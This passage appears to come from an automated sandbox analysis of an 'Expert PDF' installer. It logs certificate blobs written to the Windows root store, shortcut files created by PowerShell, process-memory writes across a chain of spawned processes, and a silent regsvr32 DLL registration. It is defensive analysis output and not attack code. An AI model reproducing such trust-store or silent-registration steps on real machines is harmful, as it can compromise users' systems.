e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1644 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 1644 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 1644 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 3672 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe
PID 3672 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe
PID 3672 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe
PID 116 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe
PID 116 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe
PID 116 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe
PID 116 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe
PID 116 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe
PID 116 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe
PID 3672 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe

"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp" /SL5="$C004A,111680340,999424,C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

"C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /s "C:\ProgramData\Expert PDF 14\Installation\Statistics.dll"

